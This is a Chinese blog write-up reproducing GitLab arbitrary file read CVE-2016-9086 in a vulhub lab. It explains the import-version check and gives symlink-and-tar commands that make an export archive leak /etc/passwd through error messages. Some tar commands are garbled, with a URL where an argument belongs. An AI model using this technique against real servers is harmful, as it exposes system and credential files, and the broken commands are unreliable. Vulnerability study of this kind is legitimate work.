当前位置:首页 > 黑客技术 > 正文内容

Gitlab 任意文件读取漏洞复现

访客4年前 (2021-04-15)黑客技术430

Gitlab 任意文件读取漏洞(CVE-2016-9086)

GitLab 是一个利用 Ruby on Rails 开发的开源应用程序,实现一个自托管的 Git 项目仓库,可通过 Web 界面进行访问公开的或者私人项目。近日研究者发现在其多个版本中存在文件读取漏洞 (CVE-2016-9086) 和 任意用户 authentication_token 泄漏漏洞,攻击者可以通过这两个漏洞来获取管理员的权限,进而控制所有 gitlab 项目。

影响版本:

  • 任意文件读取漏洞 (CVE-2016-9086):GitLab CE/EEversions 8.9, 8.10, 8.11, 8.12, and 8.13

  • 任意用户 authentication_token 泄露漏洞:Gitlab CE/EE versions 8.10.3-8.10.5

漏洞分析

本文在前辈研究基础上只分析任意斍读取漏洞。

从 8.9.0 版本开始,GitLab 新增了导入导出项目的功能。一个空的 gitlab 项目导出后结构如下:

VERSION ? ? ? ? # GitLab 的导出模块的版本
project.json ? ? # 包含了项目的配置文件

当我们导入 GitLab 的导出文件的时候,GitLab 会按照如下步骤处理:

  • 服务器根据 VERSION 文件内容检测导出文件版本,如果版本符合,则导入。

  • 服务器根据 Project.json 文件创建一个新的项目,并将对应的项目文件拷贝到服务器上对应的位置。

  • 检测 VERSION 文件的代码位于:中:

    ... def check! version=File.open(version_file, &:readline) verify_version!(version) rescue=> e shared.error(e) false end ... def verify_version!(version) if Gem::Version.new(version) !=Gem::Version.new(Gitlab::ImportExport.version) raise Gitlab::ImportExport::Error.new("Import version mismatch: Required #{Gitlab::ImportExport.version} but was #{version}") else true end end ...

    我们可以看到这里的逻辑是读取 VERSION 文件的第一行赋值给变量 version,然后检测 verison 与当前版本是否相同,相同返回 true,不相同则返回错误信息 (错误信息中包括变量 version 的值). 于是漏洞发现者 Jobert Abma 巧妙的使用了软链接来达到读取任意文件的目的。首先,我们给 VERSION 文件加上软链接并重新打包。

    ln -sf /etc/passwd VERSION tar zcf change_version.tar.gz https://www.freebuf.com/articles/web/

    这样,读取 VERSION 文件的时候服务器就会根据软链接读取到 /etc/passwd 的第一行内容并赋值给 version。但是由于 version 与当前版本不相同,所以会输出 version 的值,也就是 /etc/passwd 第一行的内容。

    但是,如果只读取任意文件的第一行,能做的事情还是太少了。漏洞发现者显然不满足这一结果,他继续找了下去.读取 Project.json 这一配置文件的代码位于:/lib/gitlab/import_export/project_tree_restorer.rb 中:

    ... def restore json=IO.read(@path) tree_hash=ActiveSupport::JSON.decode(json) project_members=tree_hash.delete('project_members') ActiveRecord::Base.no_touching do create_relations end rescue=> e shared.error(e) false end ...

    在这里,我们可以再次使用软链接使变量 json 获取到任意文件的内容,但是由于获取的文件不是 json 格式,无法 decode,导致异常抛出,最终在前端显示出任意文件的内容。 添加软链接并打包:

    ln -sf /etc/passwd project.json tar zcf change_version.tar.gz https://www.freebuf.com/articles/web/

    测试环境

    如下测试环境借助 vulhub 的 docker 镜像,附上 P 师傅的链接:https://github.com/vulhub/vulhub

    编译及运行环境:

    docker-compose up -d

    请使用 2G 及以上内存的 VPS 或虚拟机运行该环境,实测 1G 内存的机器无法正常运行 Gitlab(运行后 502 错误)。

    漏洞复现

    环境运行后,Web 端口为 10080,ssh 端口为 10022。访问 ,设置管理员(用户名 )密码,登录。

    新建一个项目,点击 :

    将 test.tar.gz上传,将会读取到 文件内容:

    漏洞修复

    官方先移除了导入包里的软连接,其次,读取 VERSION 的内容和 project.json 的内容出错后将内容输出到日志里而非返回到前端。

    参考资料

  • https://github.com/gitlabhq/gitlabhq/commit/912e1ff4284eb39fe020b8e823085a2cb7f244fb

  • http://paper.seebug.org/104/

  • https://vulhub.org/#/environments/gitlab/CVE-2016-9086/


  • 扫描二维码推送至手机访问。

    版权声明:本文由黑客接单发布,如需转载请注明出处。

    本文链接:http://therlest.com/106033.html

    分享给朋友:

    “Gitlab 任意文件读取漏洞复现” 的相关文章

    华流年京东618怎么买便宜

    京东618活动已经在火热进行中的哦,各位有买什么东西了吗?很多小伙伴在活动一开始的时候就迫不及待的买了很多东西了,还有些小伙伴还很犹豫不知道买啥,接下来百思特小编就来教教大家2020年京东618怎么便宜吧~ 京东618怎么买便宜 活动时...

    接单的黑客_可以找黑客黑美团吗

    有在网络安全范畴中,猜测网络违法和歹意软件发展趋势好像现已成为了各大网络安全公司的传统了。 为了防止让咱们去阅览上百页的安全陈述,咱们专门整兼并总结了McAfee、Forrester、FiskIQ、卡巴斯基实验室【1、2、3】、WatchGuard、Nuvias、FireEye、CyberArk、F...

    黑客了解,中国黑客越南网络apt,黑客网站密码破解工具

    6.42 · hxxp[://]offlineearthquake[.]com/file//?id=&n=000 进程三:使命履行及实时数据剖析10.61 2019年6月19日,FireEye Endpoint Security设备上收到了缝隙检测警报。 违规应用程序被辨认为Microso...

    Webshell安全检测篇

    0x00 依据流量的检测办法 1.概述 笔者一直在重视webshell的安全剖析,最近就这段时刻的心得体会和咱们做个共享。 webshell一般有三种检测办法: 依据流量方法 依据agent方法(本质是直接剖析webshell文件) 依据日志剖析方法 Webshell的分...

    二手退役62军用望远镜(二手60倍望远镜转让)

    并不是真正的军用级别产品,现在绝大部分,北京星河望远镜为您解答:我们,俺以前买过退役俄罗斯的,为满足全天侯使用要求开发成功的高密封。 需要望远镜。早期的军用望远镜,长时间看不头晕.平常旅游观景、如今已经推出军队服役,不会存在,尽管现在的光学技术水平有了很大提高。 宽带增透绿膜镜头,62式8X30望远...

    如何寻找黑客微信号(只有一个微信号,黑客可以查到对方吗)

    一、如何寻找黑客微信号(只有一个微信号,黑客可以查到对方吗) 1、有黑客能查到微信聊天记录是骗人的吗绝对是骗子,请勿相信! 微信聊天信息保存在本地 一般聊天信息都是保存在本地的,除非开通会员可以将聊天信息存储。 黑客查找出来的微信聊天截图是真的吗在手机端启动微信,在微信主界面底部导航中点击“微信”...

    评论列表

    依疚软祣
    2年前 (2022-07-07)

    .org/#/environments/gitlab/CVE-2016-9086/

    柔侣粢醍
    2年前 (2022-07-07)

    on mismatch: Required #{Gitlab::ImportExport.version} but was #{version}") el

    澄萌千仐
    2年前 (2022-07-08)

    bert Abma 巧妙的使用了软链接来达到读取任意文件的目的。首先,我们给 VERSION 文件加上软链接并重新打包。ln -sf /etc/passwd VERSIONtar zcf chang

    夙世悸初
    2年前 (2022-07-07)

    文件加上软链接并重新打包。ln -sf /etc/passwd VERSIONtar zcf change_version.tar.gz https://www.freebuf.com/ar

    发表评论

    访客

    ◎欢迎参与讨论,请在这里发表您的看法和观点。